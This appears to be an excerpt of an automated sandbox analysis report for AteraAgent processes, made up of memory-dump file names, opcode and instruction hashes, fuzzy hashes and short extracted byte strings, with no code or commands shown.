                                                                                                                                                                                                                                                                                                • Opcode ID: 5fd99a2cf8a608161313fb42c5fa87791422cfeabae7fc064b58e172bbf14d17
                                                                                                                                                                                                                                                                                                • Instruction ID: de1c2b8a96d1cd16b9967178e9fbadf7172ad63fcb71d168ce82911b664ad543
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd99a2cf8a608161313fb42c5fa87791422cfeabae7fc064b58e172bbf14d17
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26318171A1EA8D9FDF91EBA8C4A4AECBBF0FF59300F0501BAD049D71A2CA246945C701
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e8f5e878d61a1149890b86d0b14f6fe59dc05e6be86b1640539d4c8409ad42e2
                                                                                                                                                                                                                                                                                                • Instruction ID: 76f5d94c5ce9957246460eacc3838fc11520dc08df18b0969f407742a105d2d8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f5e878d61a1149890b86d0b14f6fe59dc05e6be86b1640539d4c8409ad42e2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F319370E19A4C9FDB91EBA8C855AECBBF0FF19310F0500BAD008D7196DA345944C741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ff508d2b46de588d07ee8e48abdde85d617088ded5601346023858adc072ed2c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7abcaee838305d00d72862750e358c27f57d9b9b8d67f35a52c68a02ef60bbd8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff508d2b46de588d07ee8e48abdde85d617088ded5601346023858adc072ed2c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C212732B0E69D0FDB11EF68A8B15DA7BA0FF45310B0502BBD458C32A3CD646806C391
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8671934c7dd7e5e59cc692ba2797e71d357905d07340f9bb0d1d92d6a021947c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b0f628428b906f7c7d51964c329588d1a9ccabffa9d5a96f909f16283dcf1df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8671934c7dd7e5e59cc692ba2797e71d357905d07340f9bb0d1d92d6a021947c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E215C30A0966D8FDB58EFA8D861AFEB7B5FF45300F0501AEE00AD72A1CB346950CB50
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f1ec79cb6db9cd1d801288648d9c64c06cc7f8298b556bbe4978a5e76a561d0a
                                                                                                                                                                                                                                                                                                • Instruction ID: 715128409fe8ce1903a48adbb4d38c59ab994e0694bd2b85d1d197e54e949145
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1ec79cb6db9cd1d801288648d9c64c06cc7f8298b556bbe4978a5e76a561d0a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E110662F1A98D5FE794F7DC48619ADFBE0DF45240F4101BAE008D7296CE542C014352
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a04a2950bcda06a420be1124bbde15e4c1c11703af5237fdde19410f2fba456
                                                                                                                                                                                                                                                                                                • Instruction ID: 3b6715fd1d32366cfec28ccd69809d5b99f9a9b2a6567041de6ecf91b3cfdc3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a04a2950bcda06a420be1124bbde15e4c1c11703af5237fdde19410f2fba456
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11A322A0A6DD1BE721FFA899E12ED3BA0FF42314F0505BED458871E3DD2579568281
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 51b9467750394033d32c03a9208b372586a457ed1796790c1d8a3f3801d9a359
                                                                                                                                                                                                                                                                                                • Instruction ID: a7fae2559daa9fb777e7c1ace08b9a3951f9b031f48b75be624fcaa91187d156
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51b9467750394033d32c03a9208b372586a457ed1796790c1d8a3f3801d9a359
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50110371E0D68D8FEB55EBA4C4616FDBBB0EF41300F0102B9D108EB1D2DE7866458B41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e9e1441497be4df614b238272e4e9460588bbeb9b692aa85a654fe2eaabf003
                                                                                                                                                                                                                                                                                                • Instruction ID: 5be28893cf7e31a132306754c0eee0c143201a294798dba7dff4747c5cc30e6a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e9e1441497be4df614b238272e4e9460588bbeb9b692aa85a654fe2eaabf003
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00018670D0954D8FDB60EFA4C4556FDFBB1EF4A305F11417AC048E3191CA389644CB40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5143e1eec4400a9dcf67eb9ac88671a6b0d4f70ae67595fbbae44e25e72ef590
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d24b186963af05ea04c011b29614583f92750c2b439428a8965a2b438467053
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5143e1eec4400a9dcf67eb9ac88671a6b0d4f70ae67595fbbae44e25e72ef590
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E0BF3460664D8FD794EF64C4A57A977A2FF46300F92447CD41DC7292CE36A941C700
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eabf0ebf242b1f382babf5f70d85575b7ddcc87bd615f60048b4d0bed50bbf83
                                                                                                                                                                                                                                                                                                • Instruction ID: f5f8036ae21da44438c19fa1f0c37fa75284c8992a51959deebe5b8c0f438a3e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eabf0ebf242b1f382babf5f70d85575b7ddcc87bd615f60048b4d0bed50bbf83
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 169002419CF46E01D454709538B24D47144C745120BC76465EC0C85157989E1ED60185
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 7uR$(7uR$X7uR$x6uR$x6uR$x6uR$x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-790053882
                                                                                                                                                                                                                                                                                                • Opcode ID: 83e42956c5134d127b7470ece9a76062b731ceebd060872e8a31caeb395a0a66
                                                                                                                                                                                                                                                                                                • Instruction ID: dd4f00abdcaa0cd8453bbb5d6505abf4ea1b894a986ba3adf5ca4c6e342039e6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e42956c5134d127b7470ece9a76062b731ceebd060872e8a31caeb395a0a66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85A25B70A09A1D8FDBA9EF54C8A4BA8B3A1FF58305F5140FDD01ED7295CA35AA81CF11
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: "wR$),_H$@"wR$H"wR$x6uR$x6uR$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2061390152
                                                                                                                                                                                                                                                                                                • Opcode ID: e339c7e4fde66db6ccb7e28e4678c1455938cf169135ccf25841a8ceaf7c5d92
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ce87fdb7df88e5346e7130b5769724d6219d1ca07b65260e1e7ca7922ed9b09
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e339c7e4fde66db6ccb7e28e4678c1455938cf169135ccf25841a8ceaf7c5d92
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91A29371B18A4D4FEBD9EB6884A1AA973A1FF68740F5500B9D00DC72DBDE24BD428B41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$ [uR$ [uR$ [uR$([uR$([uR$[<N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-4279637259
                                                                                                                                                                                                                                                                                                • Opcode ID: 711634d785ec389c416a85e50e7050bc3c138b859a618a63d7ea8fca6f97ca6f
                                                                                                                                                                                                                                                                                                • Instruction ID: 658172a5e1aad410f46069c1c6a30e6546f0157865c640310a06eb29cc77b526
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 711634d785ec389c416a85e50e7050bc3c138b859a618a63d7ea8fca6f97ca6f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D1C571E0AA4D8FE7A4EFA8C4647A977B1FF55300F4201BED00DD72A2CA356A85CB01
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • String ID: X9uR$XuR$`9uR$`9uR$`uR$huR$huR$huR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (8uR$08uR$88uR$@8uR$H8uR$x6uR$x6uR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8uR$x6uR$x6uR$x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 13x$2;x$3Cx$4Kx$x6uR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: uR$(uR$89uR$@9uR$H9uR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$[uR$[uR$[uR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ?$_$p!wR
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ([uR$8uR$8uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-349971988
                                                                                                                                                                                                                                                                                                • Opcode ID: d19ae7668c2c8e0901560dec3a26ec5fbce014ff5e0a4e6c73fe8b20759940d5
                                                                                                                                                                                                                                                                                                • Instruction ID: eef8d021115777e1e484cde2062f3f8da4568124fd314b60c00a14bfb26fe71c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d19ae7668c2c8e0901560dec3a26ec5fbce014ff5e0a4e6c73fe8b20759940d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80719370E09A5D8FDB95EBA8C864BE97BF1FF5A300F0101AED00DD72A2CA395945CB11
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X[uR$X[uR$`[uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2002013542
                                                                                                                                                                                                                                                                                                • Opcode ID: 57b7c09f431cbd8448480fd24b9121edbc5445cc9e72701605805e5c426cd87d
                                                                                                                                                                                                                                                                                                • Instruction ID: 28beb059f34e321b4637a82128f133715fc174c9b362d82833f6b7af13a33a3c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57b7c09f431cbd8448480fd24b9121edbc5445cc9e72701605805e5c426cd87d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46812D70E09A1D8FDBA8EFA4C8657EDB6B0FF55300F5101BED009E72A1DA345A85CB51
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1746995022
                                                                                                                                                                                                                                                                                                • Opcode ID: 8bf278b8c223f21608631848dce44dd5b6b6d12a349e90c5a45fa5a9860b6f03
                                                                                                                                                                                                                                                                                                • Instruction ID: 81af667950bd72ea05d3b1ef4b1d91d66c10d31ebcfca058379a838c2569c42d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bf278b8c223f21608631848dce44dd5b6b6d12a349e90c5a45fa5a9860b6f03
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E613B31A0E6894FD796DFA4C8607D57BF1EF56340F1601EAD048D72A2CA399E86CB11
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: f:_H$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2263521172
                                                                                                                                                                                                                                                                                                • Opcode ID: 54176ba258c725f54f95d572ae3fbc76ce7bf882b949e9dbbefd0def18113548
                                                                                                                                                                                                                                                                                                • Instruction ID: e1f4c3813efa102983ecffb9ecabf86c1de03caadf14d2ca505e1f4ec2166b35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54176ba258c725f54f95d572ae3fbc76ce7bf882b949e9dbbefd0def18113548
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B462F131B1DF8A8FEBA9DB688060A6577E1FF98340F5500B9E44DC32A7DE24ED418781
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: H$P9uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1360186544
                                                                                                                                                                                                                                                                                                • Opcode ID: 26302a9e9496c1cf307cb4afb46e6d71cc56afd487677b037c6b98a5f05b6fdf
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a56b5cd6661865fec7ef60923fb29f38bdda93ec0c63fda97d7f07e95c96e67
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26302a9e9496c1cf307cb4afb46e6d71cc56afd487677b037c6b98a5f05b6fdf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE14671B1DE490FE7A9EB6C846557977E1EFA9300B0501BEE08DC72A7DE34AC428342
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: huR$puR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3190285665
                                                                                                                                                                                                                                                                                                • Opcode ID: d9df5469386cd9449261d6ce5f0df36ec0038b7b76f7b5443202845b6f763ec2
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a80a33956bbbfb7cd972d0516028fa548920f1a861da0f8b7b16a4e10305801
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9df5469386cd9449261d6ce5f0df36ec0038b7b76f7b5443202845b6f763ec2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB19361F19A4D4BEBA8EB9898657ECB7E1FFA4310F4001BDD01DD32D6ED7868418742
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: huR$puR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3190285665
                                                                                                                                                                                                                                                                                                • Opcode ID: c21adc0e3b0b6ae9af70d3772b0636a172f03b73b49c10bbd8011ca8083690bf
                                                                                                                                                                                                                                                                                                • Instruction ID: f77ec0cef6ee36d8dbdfc3c4f79eb2ee8f40e66d686ba606f8f01604ece8f5ef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c21adc0e3b0b6ae9af70d3772b0636a172f03b73b49c10bbd8011ca8083690bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F918371F19A4D4FEB98EBA888657ECB7E1FF64310F5001B9D01CD72D6EE2869418742
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 'X_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-992657322
                                                                                                                                                                                                                                                                                                • Opcode ID: b496c9a2df944a7a139f74b6fd5de76c72f988b701fb827e89f8e772002cc474
                                                                                                                                                                                                                                                                                                • Instruction ID: f08debb91f7c8f4a7579613e44238d711a7d5446e7c49043caff107854a36f8a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b496c9a2df944a7a139f74b6fd5de76c72f988b701fb827e89f8e772002cc474
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE13271E1595D4FEBA8EB58D8A97E8B3E1FF58301F0001FA941DD3296DE346E818B41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: d
